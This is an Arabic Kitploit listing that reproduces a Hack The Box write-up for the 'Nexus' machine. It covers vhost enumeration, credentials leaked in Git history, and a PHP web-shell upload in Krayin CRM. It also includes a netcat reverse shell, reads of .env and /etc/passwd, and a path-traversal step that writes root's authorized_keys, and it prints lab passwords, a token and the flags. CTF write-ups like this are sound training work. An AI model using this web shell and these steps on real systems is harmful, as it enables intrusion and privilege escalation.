Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/diegorivas1/htb-labs-nexus
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

منذ 8س 2دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

# كتابة تحليل آلة Nexus من Hack The Box تغطي الاستطلاع، اكتشاف بيانات اعتماد Gitea، استغلال Krayin CRM عبر CVE-2026-38526، الوصول الأولي، ورفع الامتيازات من خلال خدمة مزامنة قوالب Gitea الضعيفة.

عرض المستودع

🏴‍☠️ مختبرات HTB - Nexus

الإنجليزية 🇺🇸 | الإسبانية 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 نظرة عامة

Nexus هي آلة لينكس بسهولة متوسطة (Easy) من Hack The Box توضح سلسلة هجوم متعددة المراحل تشمل تعداد المضيفات الافتراضية، كشف بيانات الاعتماد، استغلال وظائف تطبيق ويب ضعيفة، تنفيذ الأكواد عن بُعد، إعادة استخدام بيانات الاعتماد، وتصعيد الصلاحيات محليًا.

سلسلة الهجوم

root@kitploit:~
الاستطلاع
      │
      ▼
تعداد المضيفات الافتراضية
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      سجل التزامات Gitea
              │
              ▼
       بيانات اعتماد مكشوفة
              │
              ▼
        تسجيل دخول Krayin CRM
              │
              ▼
      CVE-2026-38526
              │
              ▼
        قشرة PHP
              │
              ▼
       قشرة عكسية
        (www-data)
              │
              ▼
       ملف .env للتطبيق
              │
              ▼
        SSH بصلاحية jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       اجتياز المسار
              │
              ▼
    مستودع Git خبيث
              │
              ▼
         SSH بصلاحية root

التقنيات الرئيسية

  • 🔍 تعداد المضيفات الافتراضية
  • 🔑 اكتشاف بيانات الاعتماد عبر سجل التزامات Git
  • 💻 استغلال Krayin CRM
  • 🐚 قشرة PHP وقشرة عكسية
  • 🔐 إعادة استخدام بيانات الاعتماد
  • 🔬 تعداد خدمات لينكس
  • 📂 اجتياز المسار
  • 🌳 إنشاء مستودع Git خبيث
  • 👑 تصعيد الصلاحيات إلى root

عنوان IP المستهدف: 10.129.82.92


🔍 المرحلة 1: الاستطلاع

فحص المنافذ

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

النتائج

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

تعداد المضيفات الافتراضية

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

المضيفات المكتشفة

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

أضف المضيفات المكتشفة إلى /etc/hosts:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 المرحلة 2: اكتشاف بيانات الاعتماد

تعداد Gitea

انتقل إلى:

root@kitploit:~
http://git.nexus.htb

مستودع باسم:

root@kitploit:~
admin/krayin-docker-setup

يحتوي على معلومات مفيدة في سجل Git الخاص به.

يمكن استعادة ملف .env من الالتزامات السابقة، مما يكشف عن بيانات اعتماد لم تعد موجودة في النسخة الحالية.

بيانات الاعتماد المكتشفة

الخدمةاسم المستخدمكلمة المرور
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

كما تم تحديد عنوان البريد الإلكتروني [email protected] في قسم التوظيف بالموقع الرئيسي.


💻 المرحلة 3: CVE-2026-38526 : Krayin CRM

تسجيل دخول CRM

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

Email: [email protected]
Password: N27xh!!2ucY04

رفع القشرة

انتقل إلى:

root@kitploit:~
/admin/mail/sent

ثم:

  1. انقر على Compose Mail.
  2. أرفق حمولة PHP.
  3. اعترض الطلب باستخدام Burp Suite.
  4. عدّل اسم الملف المرفوع.
  5. غيّر نوع MIME.
  6. أعد توجيه الطلب.

يتم تخزين الحمولة في:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

الحمولة:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

حقول multipart ذات الصلة هي:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

القشرة

بعد الرفع الناجح:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

النتيجة المتوقعة:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 المرحلة 4: القشرة العكسية

ابدأ مستمعًا:

root@kitploit:~
nc -lvnp 4444

ثم قم بتشغيل القشرة العكسية عبر القشرة المرفوعة.

تتوفر نسخة Python في:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

في هذه المرحلة يتم الحصول على القشرة بصلاحية:

root@kitploit:~
www-data

🐚 المرحلة 5: وصول المستخدم

قراءة إعدادات التطبيق

افحص إعدادات Krayin:

root@kitploit:~
cat /var/www/krayin/.env

يتم العثور على بيانات الاعتماد:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

تعداد المستخدمين

root@kitploit:~
cat /etc/passwd | grep sh$

يتم تحديد حساب jones.

SSH بصلاحية jones

root@kitploit:~
ssh [email protected]

كلمة المرور:

root@kitploit:~
y27xb3ha!!74GbR

علم المستخدم

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 المرحلة 6: تصعيد الصلاحيات

تعداد الخدمات

root@kitploit:~
systemctl list-units | grep -i gitea

يتم تحديد الخدمة والمؤقت التاليين:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

تعمل الخدمة بصلاحيات مرتفعة.

السكربت القابل للاستغلال

root@kitploit:~
/etc/gitea/template-sync.py

تستخدم آلية المزامنة بناء مسار يمكن استغلاله عبر اجتياز المسار.


🎯 المرحلة 7: مستودع Git خبيث

أنشئ زوج مفاتيح SSH:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

يقع استغلال معالجة كائنات Git في:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

أنشئ المستودع:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

يجب أن يستخدم المستودع فرع:

root@kitploit:~
main

رمز Gitea

أنشئ رمز وصول شخصي عبر:

root@kitploit:~
http://git.nexus.htb

انتقل إلى:

root@kitploit:~
Settings → Applications

ثم قم بتكوين الريبو البعيد:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

ادفع المستودع الخبيث:

root@kitploit:~
git push -f origin main

⏰ المرحلة 8: مزامنة القوالب

راقب سجل المزامنة:

root@kitploit:~
tail -f /var/log/template-sync.log

تؤدي المزامنة الناجحة إلى معالجة شجرة Git الخبيثة بواسطة الخدمة المميزة.

مثال:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 المرحلة 9: الجذر

بمجرد كتابة المفتاح العام SSH في حساب الجذر:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

تحقق من الوصول:

root@kitploit:~
whoami

المتوقع:

root@kitploit:~
root

استرجع علم الجذر:

root@kitploit:~
cat /root/root.txt

علم الجذر

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 الأعلام

العلمالقيمة
المستخدمf20cbf9aeb6bb228d356a42ff49c1933
الجذر85be1d2a3084e387da0e7dd118908c63

🔐 بيانات الاعتماد

تنتمي بيانات الاعتماد هذه إلى بيئة مختبر Hack The Box الموثقة في هذا المستودع.


🛠️ الأدوات


📁 هيكل المستودع

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 موارد إضافية

  • CVE-2026-38526
  • Krayin CRM
  • توثيق Gitea
  • OWASP Path Traversal

⚠️ إخلاء المسؤولية

هذا المستودع مخصص لأغراض تعليمية واختبارات الأمان المصرح بها فقط.

يجب عدم استخدام التقنيات وبيانات الاعتماد والاستغلالات والأوامر الموثقة هنا ضد أي أنظمة دون إذن صريح.


🎯 النقاط الرئيسية المستفادة

  1. 🔍 قم بتعداد المضيفات الافتراضية: قد تكون الخدمات المهمة مخفية خلف نطاقات فرعية.
  2. 🔑 راجع سجل Git: إزالة سر من ملف لا تعني اختفاءه من سجل المستودع.
  3. 💻 حلل رفع الملفات: يمكن أن يكون التحقق من الامتداد ونوع MIME ضوابط أمنية حاسمة.
  4. 🐚 قم بالتعداد بعد الحصول على قشرة: قد تحتوي ملفات الإعدادات على بيانات اعتماد قابلة لإعادة الاستخدام.
  5. 🔬 راجع الخدمات المميزة: يمكن أن تصبح الخدمة التي تعمل بصلاحية root ناقلًا لتصعيد الصلاحيات.
  6. 📂 تحقق من صحة مسارات الملفات: يمكن أن يؤدي التعامل غير الآمن مع المسارات التي يتحكم بها المستخدم إلى ثغرات اجتياز المسار.
  7. 🌳 يمكن أن يصبح Git ناقل هجوم: يمكن التلاعب بكائنات وأشجار Git عندما يثق التطبيق في بنيتها بشكل غير صحيح.

🙏 الشكر والتقدير

  • Hack The Box : الآلة ومنصة المختبر
  • P3lured : الشرح الأصلي
  • Tran Manh Tan : دليل تكميلي

⭐ إذا وجدت هذا الشرح مفيدًا، فكر في منح المستودع نجمة.

تنزيل الأداة
الخدمةاسم المستخدمكلمة المرور / المفتاح
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
رمز Giteajones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH الجذرroot/tmp/nexus_root
الأداةالغرض
Nmapتعداد المنافذ والخدمات
Gobusterتعداد المضيفات الافتراضية
Burp Suiteاعتراض وتعديل طلبات HTTP
Gitتحليل المستودعات وإنشاء مستودع خبيث
Python 3سكربتات الاستغلال
Netcatمستمع القشرة العكسية
LinEnumتعداد لينكس
LinPEASتعداد تصعيد الصلاحيات
SSHالوصول عن بُعد